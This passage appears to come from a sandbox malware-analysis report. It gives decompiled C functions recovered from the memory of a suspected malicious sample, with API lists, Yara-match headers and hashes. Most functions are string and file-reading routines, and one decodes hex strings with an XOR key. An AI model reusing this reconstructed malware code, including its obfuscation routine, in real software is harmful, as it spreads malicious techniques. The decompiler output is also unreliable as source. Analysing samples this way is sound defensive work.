                                        				 *[fs:0x0] =  &_v16;
                                        				_t151 = __ecx;
                                        				_t91 =  *( *(__ecx + 0x20));
                                        				_t147 = 0;
                                        				if(_t91 == 0) {
                                        					L3:
                                        					__eflags =  *(_t151 + 0x54) - _t147;
                                        					if( *(_t151 + 0x54) == _t147) {
                                        						L51:
                                        						_t92 = _t91 | 0xffffffff;
                                        						__eflags = _t91 | 0xffffffff;
                                        						L52:
                                        						 *[fs:0x0] = _v16;
                                        						_pop(_t152);
                                        						_pop(_t156);
                                        						_pop(_t117);
                                        						return E29DADF46(_t92, _t117, _v20 ^ _t166, _t147, _t152, _t156);
                                        					}
                                        					_t129 =  *(_t151 + 0x10);
                                        					_t157 = _t151 + 0x48;
                                        					__eflags =  *_t129 - _t151 + 0x48;
                                        					if( *_t129 == _t151 + 0x48) {
                                        						_t157 =  *((intOrPtr*)(_t151 + 0x3c));
                                        						 *_t129 =  *((intOrPtr*)(_t151 + 0x3c));
                                        						 *((intOrPtr*)( *((intOrPtr*)(_t151 + 0x20)))) =  *((intOrPtr*)(_t151 + 0x40));
                                        						_t129 =  *(_t151 + 0x30);
                                        						__eflags = 0;
                                        						 *_t129 = 0;
                                        					}
                                        					__eflags =  *(_t151 + 0x44) - _t147;
                                        					if(__eflags != 0) {
                                        						_v28 = 0xf;
                                        						_v32 = _t147;
                                        						_v48 = _t147;
                                        						_v8 = _t147;
                                        						_t147 =  *(_t151 + 0x54);
                                        						_push( *(_t151 + 0x54));
                                        						_t118 = E29DAF5AA(_t116, _t151, _t157, __eflags);
                                        						_t169 = _t168 + 4;
                                        						__eflags = _t118 - 0xffffffff;
                                        						if(_t118 == 0xffffffff) {
                                        							L42:
                                        							_t91 = E29D89160( &_v48);
                                        							goto L51;
                                        						}
                                        						while(1) {
                                        							_t95 = _v32;
                                        							__eflags = (_t129 | 0xffffffff) - _t95 - 1;
                                        							if((_t129 | 0xffffffff) - _t95 <= 1) {
                                        								break;
                                        							}
                                        							_t162 = _t95 + 1;
                                        							__eflags = _t162 - 0xfffffffe;
                                        							if(_t162 > 0xfffffffe) {
                                        								break;
                                        							}
                                        							_t135 = _v28;
                                        							__eflags = _t135 - _t162;
                                        							if(_t135 >= _t162) {
                                        								__eflags = _t162;
                                        								if(_t162 != 0) {
                                        									L15:
                                        									__eflags = _t135 - 0x10;
                                        									_t136 = _v48;
                                        									if(_t135 < 0x10) {
                                        										_t136 =  &_v48;
                                        									}
                                        									 *((char*)(_t136 + _t95)) = _t118;
                                        									__eflags = _v28 - 0x10;
                                        									_t100 = _v48;
                                        									_v32 = _t162;
                                        									if(_v28 < 0x10) {
                                        										_t100 =  &_v48;
                                        									}
                                        									 *((char*)(_t100 + _t162)) = 0;
                                        									L20:
                                        									_t101 = _v32;
                                        									_t137 = _v28;
                                        									L21:
                                        									_t148 = _v48;
                                        									__eflags = _t137 - 0x10;
                                        									if(_t137 < 0x10) {
                                        										_v60 =  &_v48;
                                        									} else {
                                        										_v60 = _t148;
                                        									}
                                        									__eflags = _t137 - 0x10;
                                        									if(_t137 < 0x10) {
                                        										_t148 =  &_v48;
                                        									}
                                        									_t129 =  *(_t151 + 0x44);
                                        									_t164 =  *_t129;
                                        									_t118 = _v60 + _t101;
                                        									_t147 = _t151 + 0x4c;
                                        									_t91 =  *((intOrPtr*)( *((intOrPtr*)( *_t129 + 0x10))))(_t151 + 0x4c, _t148, _v60 + _t101,  &_v56,  &_v49,  &_v48,  &_v64);
                                        									__eflags = _t91;
                                        									if(_t91 < 0) {
                                        										L49:
                                        										__eflags = _v28 - 0x10;
                                        										if(_v28 >= 0x10) {
                                        											_t147 = _v48;
                                        											_push(_v48);
                                        											_t91 = E29DADF3B();
                                        										}
                                        										goto L51;
                                        									} else {
                                        										__eflags = _t91 - 1;
                                        										if(_t91 <= 1) {
                                        											__eflags = _v64 -  &_v49;
                                        											if(_v64 !=  &_v49) {
                                        												L44:
                                        												__eflags = _v28 - 0x10;
                                        												_t158 = _v48;
                                        												if(_v28 < 0x10) {
                                        													_t158 =  &_v48;
                                        												}
                                        												_t160 = _t158 - _v56 + _v32;
                                        												__eflags = _t160;
                                        												if(__eflags <= 0) {
                                        													L48:
                                        													E29D89160( &_v48);
                                        													_t92 = _v49 & 0x000000ff;
                                        													goto L52;
                                        												} else {
                                        													do {
                                        														_t147 =  *(_t151 + 0x54);
                                        														_t134 =  *((char*)(_t160 + _v56 - 1));
                                        														_t160 = _t160 - 1;
                                        														_push( *(_t151 + 0x54));
                                        														_push(_t134);
                                        														E29DAF10C(_t118, _t151, _t160, __eflags);
                                        														_t169 = _t169 + 8;
                                        														__eflags = _t160;
                                        													} while (__eflags > 0);
                                        													goto L48;
                                        												}
                                        											}
                                        											__eflags = _v28 - 0x10;
                                        											_t103 = _v48;
                                        											if(_v28 < 0x10) {
                                        												_t103 =  &_v48;
                                        											}
                                        											_t147 = _v56 - _t103;
                                        											__eflags = _v56 - _t103;
                                        											_t129 =  &_v48;
                                        											E29D896C0(_t129, 0, _v56 - _t103);
                                        											L41:
                                        											_push( *(_t151 + 0x54));
                                        											_t118 = E29DAF5AA(_t118, _t151, _t164, __eflags);
                                        											_t169 = _t169 + 4;
                                        											__eflags = _t118 - 0xffffffff;
                                        											if(_t118 != 0xffffffff) {
                                        												continue;
                                        											}
                                        											goto L42;
                                        										}
                                        										__eflags = _t91 - 3;
                                        										if(_t91 != 3) {
                                        											goto L49;
                                        										}
                                        										__eflags = _v32 - 1;
                                        										if(__eflags < 0) {
                                        											goto L41;
                                        										}
                                        										__eflags = _v28 - 0x10;
                                        										_t107 = _v48;
                                        										if(_v28 < 0x10) {
                                        											_t107 =  &_v48;
                                        										}
                                        										E29DAF7CF( &_v49, 1, _t107, 1);
                                        										E29D89160( &_v48);
                                        										_t92 = _v49 & 0x000000ff;
                                        										goto L52;
                                        									}
                                        								}
                                        								_t110 = _v48;
                                        								_v32 = _t162;
                                        								__eflags = _t135 - 0x10;
                                        								if(_t135 < 0x10) {
                                        									_t110 =  &_v48;
                                        								}
                                        								 *_t110 = 0;
                                        								goto L20;
                                        							}
                                        							E29D89750( &_v48, _t162, _t95);
                                        							_t137 = _v28;
                                        							_t101 = _v32;
                                        							__eflags = _t162;
                                        							if(_t162 == 0) {
                                        								goto L21;
                                        							}
                                        							goto L15;
                                        						}
                                        						E29DAD440("string too long");
                                        						goto L44;
                                        					} else {
                                        						_push( *(_t151 + 0x54));
                                        						_t91 = E29DAF5AA(_t116,  *(_t151 + 0x54), _t157, __eflags);
                                        						__eflags = _t91 - 0xffffffff;
                                        						if(_t91 == 0xffffffff) {
                                        							goto L51;
                                        						}
                                        						_t92 = _t91 & 0x000000ff;
                                        						goto L52;
                                        					}
                                        				}
                                        				_t91 =  *( *(__ecx + 0x20));
                                        				if(_t91 >=  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) + _t91) {
                                        					goto L3;
                                        				}
                                        				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) - 1;
                                        				_t154 =  *(__ecx + 0x20);
                                        				_t115 =  *_t154;
                                        				_t147 =  &(_t115[1]);
                                        				 *_t154 =  &(_t115[1]);
                                        				_t92 =  *_t115 & 0x000000ff;
                                        				goto L52;
                                        			}














































                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _fgetc$_memcpy_s
                                        • String ID: string too long
                                        • API String ID: 160369518-2556327735
                                        • Opcode ID: a847fe72d58357a19c098a7168f8b8bde5a4c16f77316cd6c759ee8f8719924e
                                        • Instruction ID: 1b9da13c644d9d1998f3a52a978bf8213e8d1faaefa6c0dd3f6746da15bb62da
                                        • Opcode Fuzzy Hash: a847fe72d58357a19c098a7168f8b8bde5a4c16f77316cd6c759ee8f8719924e
                                        • Instruction Fuzzy Hash: 4391A171D002199FCB05CFACC8809EEB7B5FF59310F50851EE922A7A91D731E926DBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29D8C6A0(char* __esi) {
                                        				struct _OVERLAPPED* _v8;
                                        				struct _OVERLAPPED* _v12;
                                        				struct _OVERLAPPED* _v16;
                                        				void* _v20;
                                        				intOrPtr _v24;
                                        				long _v28;
                                        				struct _OVERLAPPED* _v32;
                                        				void* __edi;
                                        				signed int _t60;
                                        				signed int _t61;
                                        				struct _OVERLAPPED* _t62;
                                        				struct _OVERLAPPED* _t66;
                                        				struct _OVERLAPPED* _t68;
                                        				struct _OVERLAPPED* _t69;
                                        				signed int _t71;
                                        				void* _t73;
                                        				struct _OVERLAPPED* _t86;
                                        				long _t88;
                                        				intOrPtr _t91;
                                        				void* _t97;
                                        				struct _OVERLAPPED* _t99;
                                        				struct _OVERLAPPED* _t108;
                                        				signed int _t110;
                                        				char* _t112;
                                        				void* _t113;
                                        				void* _t114;
                                        
                                        				_t112 = __esi;
                                        				if( *__esi == 0) {
                                        					 *((intOrPtr*)(__esi + 0x1c)) =  *((intOrPtr*)(__esi + 0x18));
                                        					goto L3;
                                        				} else {
                                        					if( *((char*)(__esi + 1)) == 0) {
                                        						return _t60 | 0xffffffff;
                                        					} else {
                                        						SetFilePointer( *(__esi + 4), 0, 0, 2);
                                        						L3:
                                        						if( *_t112 == 0) {
                                        							_t99 =  *(_t112 + 0x1c);
                                        							_v8 = _t99;
                                        							_t86 = _t99;
                                        						} else {
                                        							if( *((char*)(_t112 + 1)) == 0) {
                                        								_v8 = 0;
                                        								_t86 = _v8;
                                        							} else {
                                        								_t86 = SetFilePointer( *(_t112 + 4), 0, 0, 1) -  *((intOrPtr*)(_t112 + 0xc));
                                        								_v8 = _t86;
                                        							}
                                        						}
                                        						_t108 = 0xffff;
                                        						_v12 = 0xffff;
                                        						if(_t86 < 0xffff) {
                                        							_v12 = _t86;
                                        							_t108 = _t86;
                                        						}
                                        						_t61 = E29DADFE0(_t99, _t108, _t112, 0x404);
                                        						_t114 = _t113 + 4;
                                        						_v20 = _t61;
                                        						if(_t61 != 0) {
                                        							_t62 = 4;
                                        							_v24 = 0xffffffff;
                                        							if(_t108 > 4) {
                                        								while(1) {
                                        									_t66 = _t62 + 0x400;
                                        									_v16 = _t108;
                                        									if(_t66 <= _t108) {
                                        										_v16 = _t66;
                                        									}
                                        									_t68 = _t86 - _v16;
                                        									_t88 = _t86 - _t68;
                                        									_v32 = _t68;
                                        									if(_t88 > 0x404) {
                                        										_t88 = 0x404;
                                        									}
                                        									if( *_t112 == 0) {
                                        										goto L24;
                                        									}
                                        									if( *((char*)(_t112 + 1)) != 0) {
                                        										SetFilePointer( *(_t112 + 4),  *((intOrPtr*)(_t112 + 0xc)) + _t68, 0, 0);
                                        										L25:
                                        										_t110 = _t88;
                                        										if( *_t112 == 0) {
                                        											_t69 =  *(_t112 + 0x1c);
                                        											_t91 =  *((intOrPtr*)(_t112 + 0x18));
                                        											if(_t69 + _t88 > _t91) {
                                        												_t110 = _t91 - _t69;
                                        											}
                                        											E29DB0010(_v20,  *((intOrPtr*)(_t112 + 0x14)) + _t69, _t110);
                                        											_t114 = _t114 + 0xc;
                                        											 *(_t112 + 0x1c) =  *(_t112 + 0x1c) + _t110;
                                        											_t71 = _t110;
                                        										} else {
                                        											if(ReadFile( *(_t112 + 4), _v20, _t88,  &_v28, 0) == 0) {
                                        												 *((char*)(_t112 + 8)) = 1;
                                        											}
                                        											_t71 = _v28;
                                        										}
                                        										if(_t71 / _t88 == 1) {
                                        											_t73 = _t88 - 3;
                                        											if(_t73 >= 0) {
                                        												while(1) {
                                        													_t97 = _v20;
                                        													_t73 = _t73 - 1;
                                        													if( *((char*)(_t73 + _t97)) == 0x50 &&  *((char*)(_t73 + _t97 + 1)) == 0x4b &&  *((char*)(_t73 + _t97 + 2)) == 5 &&  *((char*)(_t73 + _t97 + 3)) == 6) {
                                        														break;
                                        													}
                                        													if(_t73 >= 0) {
                                        														continue;
                                        													} else {
                                        													}
                                        													goto L42;
                                        												}
                                        												_v24 = _t73 + _v32;
                                        											}
                                        											L42:
                                        											if(_v24 == 0 && _v16 < _v12) {
                                        												_t108 = _v12;
                                        												_t62 = _v16;
                                        												_t86 = _v8;
                                        												continue;
                                        											}
                                        										}
                                        									}
                                        									goto L44;
                                        									L24:
                                        									 *(_t112 + 0x1c) = _t68;
                                        									goto L25;
                                        								}
                                        							}
                                        							L44:
                                        							E29DADFA6(_v20);
                                        							return _v24;
                                        						} else {
                                        							return _t61 | 0xffffffff;
                                        						}
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 29D8C6BB
                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 29D8C6D7
                                        • _malloc.LIBCMT ref: 29D8C721
                                        • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 29D8C79C
                                        • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 29D8C7BD
                                        • _memmove.LIBCMT ref: 29D8C7EC
                                        • _free.LIBCMT ref: 29D8C851
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Pointer$Read_free_malloc_memmove
                                        • String ID:
                                        • API String ID: 2793708502-0
                                        • Opcode ID: e2ee13e746e5582267a7421ae69ad417d7a68c03c2b82a2960617d6b9261bea7
                                        • Instruction ID: 6db6840680703bc456383e994ca0059eb4e30ecc9722aafa8091128ce3fd9038
                                        • Opcode Fuzzy Hash: e2ee13e746e5582267a7421ae69ad417d7a68c03c2b82a2960617d6b9261bea7
                                        • Instruction Fuzzy Hash: 9551CBB5E01245EFEB24CFB4C881B6ABBF5BF44300F10896EE64597A82D770A943DB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29D89C70(void* __eax, intOrPtr* __ecx, intOrPtr _a4) {
                                        				void* __ebx;
                                        				void* __esi;
                                        				intOrPtr _t20;
                                        				intOrPtr _t22;
                                        				intOrPtr* _t23;
                                        				intOrPtr* _t26;
                                        				char* _t31;
                                        				intOrPtr* _t35;
                                        				intOrPtr* _t36;
                                        				void* _t43;
                                        				intOrPtr _t49;
                                        				intOrPtr _t50;
                                        				intOrPtr* _t51;
                                        				intOrPtr _t53;
                                        				signed int _t54;
                                        				intOrPtr _t61;
                                        				intOrPtr* _t66;
                                        
                                        				_t43 = __eax;
                                        				_t66 = __ecx;
                                        				if(__eax == 0) {
                                        					L12:
                                        					_t20 =  *((intOrPtr*)(_t66 + 0x10));
                                        					_t49 = _a4;
                                        					if((_t54 | 0xffffffff) - _t20 <= _t49) {
                                        						_t20 = E29DAD440("string too long");
                                        					}
                                        					if(_t49 == 0) {
                                        						L36:
                                        						return _t66;
                                        					} else {
                                        						_t61 = _t20 + _t49;
                                        						if(_t61 > 0xfffffffe) {
                                        							_t20 = E29DAD440("string too long");
                                        						}
                                        						_t50 =  *((intOrPtr*)(_t66 + 0x14));
                                        						if(_t50 >= _t61) {
                                        							if(_t61 != 0) {
                                        								goto L19;
                                        							} else {
                                        								 *((intOrPtr*)(_t66 + 0x10)) = _t61;
                                        								if(_t50 < 0x10) {
                                        									_t31 = _t66;
                                        									 *_t31 = 0;
                                        									return _t31;
                                        								} else {
                                        									 *((char*)( *_t66)) = 0;
                                        									return _t66;
                                        								}
                                        							}
                                        						} else {
                                        							E29D89750(_t66, _t61, _t20);
                                        							if(_t61 == 0) {
                                        								L35:
                                        								goto L36;
                                        							} else {
                                        								L19:
                                        								_t22 =  *((intOrPtr*)(_t66 + 0x14));
                                        								if(_t22 < 0x10) {
                                        									_t51 = _t66;
                                        								} else {
                                        									_t51 =  *_t66;
                                        								}
                                        								if(_t22 < 0x10) {
                                        									_t23 = _t66;
                                        								} else {
                                        									_t23 =  *_t66;
                                        								}
                                        								E29DAE1F0(_t23 + _a4, _t51,  *((intOrPtr*)(_t66 + 0x10)));
                                        								if( *((intOrPtr*)(_t66 + 0x14)) < 0x10) {
                                        									_t26 = _t66;
                                        								} else {
                                        									_t26 =  *_t66;
                                        								}
                                        								E29DB0010(_t26, _t43, _a4);
                                        								 *((intOrPtr*)(_t66 + 0x10)) = _t61;
                                        								if( *((intOrPtr*)(_t66 + 0x14)) < 0x10) {
                                        									 *((char*)(_t66 + _t61)) = 0;
                                        									goto L35;
                                        								} else {
                                        									 *((char*)( *_t66 + _t61)) = 0;
                                        									return _t66;
                                        								}
                                        							}
                                        						}
                                        					}
                                        				} else {
                                        					_t53 =  *((intOrPtr*)(__ecx + 0x14));
                                        					if(_t53 < 0x10) {
                                        						_t35 = __ecx;
                                        					} else {
                                        						_t35 =  *__ecx;
                                        					}
                                        					if(_t43 < _t35) {
                                        						goto L12;
                                        					} else {
                                        						if(_t53 < 0x10) {
                                        							_t36 = _t66;
                                        						} else {
                                        							_t36 =  *_t66;
                                        						}
                                        						_t54 =  *((intOrPtr*)(_t66 + 0x10)) + _t36;
                                        						if(_t54 <= _t43) {
                                        							goto L12;
                                        						} else {
                                        							if(_t53 < 0x10) {
                                        								return E29D89B10(_a4, _t66, _t53, _t66, _t43 - _t66);
                                        							} else {
                                        								return E29D89B10(_a4, _t66, _t53, _t66, _t43 -  *_t66);
                                        							}
                                        						}
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D89CE6
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D89D01
                                        • _memmove.LIBCMT ref: 29D89D66
                                        • _memmove.LIBCMT ref: 29D89D80
                                          • Part of subcall function 29D89B10: std::_Xinvalid_argument.LIBCPMT ref: 29D89B3E
                                          • Part of subcall function 29D89B10: std::_Xinvalid_argument.LIBCPMT ref: 29D89B5B
                                          • Part of subcall function 29D89B10: _memmove.LIBCMT ref: 29D89BC1
                                          • Part of subcall function 29D89B10: _memmove.LIBCMT ref: 29D89BF0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Xinvalid_argument_memmovestd::_
                                        • String ID: Software\Micr$string too long
                                        • API String ID: 256744135-3427781227
                                        • Opcode ID: c998182545fd7416e15b2fb7178d9d99953720857ed65ef7e7cd6662a24435b9
                                        • Instruction ID: ec513d6c683afcd58fbf5302aaba1882bdd78f8118512b2596f67d2c70ec6330
                                        • Opcode Fuzzy Hash: c998182545fd7416e15b2fb7178d9d99953720857ed65ef7e7cd6662a24435b9
                                        • Instruction Fuzzy Hash: E641F6723106109BD324CE5CE8C895AF3E9FF956607104A2EE2D2CBE56C771AC93D7A4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 80%
                                        			E29D9D160(long* __ecx, CHAR* __edx, void** _a4) {
                                        				intOrPtr _v8;
                                        				char _v16;
                                        				signed int _v20;
                                        				char _v24;
                                        				void** _v28;
                                        				intOrPtr _v32;
                                        				intOrPtr _v36;
                                        				char _v40;
                                        				char _v68;
                                        				char _v96;
                                        				void** _v100;
                                        				long* _v104;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t28;
                                        				signed int _t29;
                                        				intOrPtr _t32;
                                        				char _t33;
                                        				signed int _t35;
                                        				void* _t38;
                                        				void* _t43;
                                        				int _t45;
                                        				void* _t47;
                                        				void* _t48;
                                        				intOrPtr* _t49;
                                        				void* _t55;
                                        				long _t56;
                                        				intOrPtr _t58;
                                        				char _t71;
                                        				signed int _t75;
                                        				void* _t76;
                                        				signed int _t77;
                                        				CHAR* _t82;
                                        				void* _t83;
                                        				signed int _t85;
                                        
                                        				_push(0xffffffff);
                                        				_push(E29DC21B8);
                                        				_push( *[fs:0x0]);
                                        				_t28 =  *0x29dd5664; // 0xd9555f04
                                        				_t29 = _t28 ^ _t85;
                                        				_v20 = _t29;
                                        				_push(_t29);
                                        				 *[fs:0x0] =  &_v16;
                                        				_t82 = __edx;
                                        				_t71 = "0123456789ABCDEF"; // 0x33323130
                                        				_v100 = _a4;
                                        				_t32 = M29DCFFB8; // 0x37363534
                                        				_v104 = __ecx;
                                        				_t58 = M29DCFFBC; // 0x42413938
                                        				_v40 = _t71;
                                        				_t72 =  *0x29dcffc0; // 0x46454443
                                        				_v36 = _t32;
                                        				_t33 =  *0x29dcffc4; // 0x0
                                        				_v32 = _t58;
                                        				_v28 = _t72;
                                        				_v24 = _t33;
                                        				_t75 = 0;
                                        				if(lstrlenA(__edx) <= 0) {
                                        					L8:
                                        					_t35 = _t75;
                                        				} else {
                                        					_t38 = E29DAF190( &_v40,  *_t82);
                                        					if(_t38 != 0) {
                                        						_t72 =  &_v40;
                                        						_t77 = _t38 -  &_v40 << 4;
                                        						_t43 = E29DAF190( &_v40, _t82[1]);
                                        						if(_t43 == 0) {
                                        							goto L2;
                                        						} else {
                                        							_t75 =  !(_t77 + _t43 -  &_v40 ^ 0xffffffa3) & 0x000000ff;
                                        							_t45 = lstrlenA(_t82);
                                        							_t72 = _v104;
                                        							_t16 = _t45 - 1; // -1
                                        							_t56 = _t16;
                                        							 *_v104 = _t56;
                                        							_t47 = HeapAlloc(GetProcessHeap(), 8, _t56);
                                        							 *_v100 = _t47;
                                        							if(_t47 == 0) {
                                        								goto L2;
                                        							} else {
                                        								_t48 = E29D89100( &_v68, _t82);
                                        								_v8 = 0;
                                        								_t49 = E29D951E0(2, _t48,  &_v96, 0xffffffff);
                                        								if( *((intOrPtr*)(_t49 + 0x14)) >= 0x10) {
                                        									_t49 =  *_t49;
                                        								}
                                        								_t72 = _v100;
                                        								E29DAE6AF( *_v100, _t56, _t49);
                                        								E29D89160( &_v96);
                                        								E29D89160( &_v68);
                                        								goto L8;
                                        							}
                                        						}
                                        					} else {
                                        						L2:
                                        						_t35 = 0;
                                        					}
                                        				}
                                        				 *[fs:0x0] = _v16;
                                        				_pop(_t76);
                                        				_pop(_t83);
                                        				_pop(_t55);
                                        				return E29DADF46(_t35, _t55, _v20 ^ _t85, _t72, _t76, _t83);
                                        			}

                                        APIs
                                        • lstrlenA.KERNEL32(?,D9555F04,?,?,00000000), ref: 29D9D1C4
                                        • lstrlenA.KERNEL32(?), ref: 29D9D21E
                                        • GetProcessHeap.KERNEL32(00000008,-00000001), ref: 29D9D22F
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D9D236
                                        • _strcpy_s.LIBCMT ref: 29D9D276
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heaplstrlen$AllocProcess_strcpy_s
                                        • String ID: 0123456789ABCDEF
                                        • API String ID: 3087150108-2554083253
                                        • Opcode ID: 7fb648c46144ce2e5ca405075950ed756379b280048d28a3d4bfe3c86f5118ee
                                        • Instruction ID: c7ededa59066ee3d985012c0c00aae273de1cb725be35e0a259f6063217642ce
                                        • Opcode Fuzzy Hash: 7fb648c46144ce2e5ca405075950ed756379b280048d28a3d4bfe3c86f5118ee
                                        • Instruction Fuzzy Hash: 7A41A3729042499FDB04DFA8DD44A9EB7B9EF59350F108169E815E7380EB34AA06DBB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29D89A20(void* __eax, signed int __ecx, intOrPtr* __esi, intOrPtr* _a4, intOrPtr _a8) {
                                        				intOrPtr _t19;
                                        				void* _t20;
                                        				intOrPtr _t21;
                                        				intOrPtr* _t24;
                                        				char* _t29;
                                        				void* _t33;
                                        				signed int _t34;
                                        				intOrPtr _t37;
                                        				intOrPtr* _t38;
                                        				intOrPtr _t41;
                                        				intOrPtr _t45;
                                        				intOrPtr* _t50;
                                        
                                        				_t50 = __esi;
                                        				_t34 = __ecx;
                                        				_t41 = _a8;
                                        				_t33 = __eax;
                                        				_t3 = _a4 + 0x10; // 0x45c6ffff
                                        				_t19 =  *_t3;
                                        				if(_t19 < _t41) {
                                        					_t19 = E29DAD48D("invalid string position");
                                        				}
                                        				_t20 = _t19 - _t41;
                                        				if(_t20 < _t33) {
                                        					_t33 = _t20;
                                        				}
                                        				_t21 =  *((intOrPtr*)(_t50 + 0x10));
                                        				if((_t34 | 0xffffffff) - _t21 <= _t33) {
                                        					_t21 = E29DAD440("string too long");
                                        				}
                                        				if(_t33 == 0) {
                                        					L24:
                                        					return _t50;
                                        				} else {
                                        					_t45 = _t21 + _t33;
                                        					if(_t45 > 0xfffffffe) {
                                        						_t21 = E29DAD440("string too long");
                                        					}
                                        					_t37 =  *((intOrPtr*)(_t50 + 0x14));
                                        					if(_t37 >= _t45) {
                                        						if(_t45 != 0) {
                                        							goto L11;
                                        						} else {
                                        							 *((intOrPtr*)(_t50 + 0x10)) = _t45;
                                        							if(_t37 < 0x10) {
                                        								_t29 = _t50;
                                        								 *_t29 = 0;
                                        								return _t29;
                                        							} else {
                                        								 *((char*)( *_t50)) = 0;
                                        								return _t50;
                                        							}
                                        						}
                                        					} else {
                                        						E29D89750(_t50, _t45, _t21);
                                        						_t41 = _a8;
                                        						if(_t45 == 0) {
                                        							L23:
                                        							goto L24;
                                        						} else {
                                        							L11:
                                        							_t38 = _a4;
                                        							if( *((intOrPtr*)(_t38 + 0x14)) >= 0x10) {
                                        								_t38 =  *_t38;
                                        							}
                                        							if( *((intOrPtr*)(_t50 + 0x14)) < 0x10) {
                                        								_t24 = _t50;
                                        							} else {
                                        								_t24 =  *_t50;
                                        							}
                                        							E29DB0010( *((intOrPtr*)(_t50 + 0x10)) + _t24, _t38 + _t41, _t33);
                                        							 *((intOrPtr*)(_t50 + 0x10)) = _t45;
                                        							if( *((intOrPtr*)(_t50 + 0x14)) < 0x10) {
                                        								 *((char*)(_t50 + _t45)) = 0;
                                        								goto L23;
                                        							} else {
                                        								 *((char*)( *_t50 + _t45)) = 0;
                                        								return _t50;
                                        							}
                                        						}
                                        					}
                                        				}
                                        			}
















                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D89A38
                                          • Part of subcall function 29DAD48D: std::exception::exception.LIBCMT ref: 29DAD4A2
                                          • Part of subcall function 29DAD48D: __CxxThrowException@8.LIBCMT ref: 29DAD4B7
                                          • Part of subcall function 29DAD48D: std::exception::exception.LIBCMT ref: 29DAD4C8
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D89A56
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D89A71
                                        • _memmove.LIBCMT ref: 29D89AD5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
                                        • String ID: invalid string position$string too long
                                        • API String ID: 443534600-4289949731
                                        • Opcode ID: 7a8363e2851c447244d12e3c96e9d1da0931e5a55f4b1b7de23cf2d54d2d1530
                                        • Instruction ID: c8f9116eddba3f103ad1c5796887a6ec08d5eef99d8a993ea3b3f89822ac9b39
                                        • Opcode Fuzzy Hash: 7a8363e2851c447244d12e3c96e9d1da0931e5a55f4b1b7de23cf2d54d2d1530
                                        • Instruction Fuzzy Hash: E321D835300200AFD314CF6CD8C4A1AB7E5FF90614F204A2EE1D6ABE56D771D947A3A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E29DA6F10(void* __eax, signed int __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                        				void* __esi;
                                        				intOrPtr _t16;
                                        				intOrPtr _t18;
                                        				intOrPtr* _t19;
                                        				char* _t28;
                                        				char _t33;
                                        				intOrPtr _t38;
                                        				intOrPtr _t39;
                                        				intOrPtr* _t40;
                                        				signed int _t44;
                                        				intOrPtr* _t50;
                                        				void* _t51;
                                        
                                        				_t50 = __edi;
                                        				_t44 = __edx;
                                        				_t51 = __eax;
                                        				_t16 =  *((intOrPtr*)(__edi + 0x10));
                                        				if(_t16 < __eax) {
                                        					_t16 = E29DAD48D("invalid string position");
                                        				}
                                        				_t38 = _a4;
                                        				if((_t44 | 0xffffffff) - _t16 <= _t38) {
                                        					_t16 = E29DAD440("string too long");
                                        				}
                                        				if(_t38 == 0) {
                                        					L23:
                                        					return _t50;
                                        				} else {
                                        					_t33 = _t16 + _t38;
                                        					if(_t33 > 0xfffffffe) {
                                        						_t16 = E29DAD440("string too long");
                                        					}
                                        					_t39 =  *((intOrPtr*)(_t50 + 0x14));
                                        					if(_t39 >= _t33) {
                                        						if(_t33 != 0) {
                                        							goto L9;
                                        						} else {
                                        							 *((intOrPtr*)(_t50 + 0x10)) = _t33;
                                        							if(_t39 < 0x10) {
                                        								_t28 = _t50;
                                        								 *_t28 = 0;
                                        								return _t28;
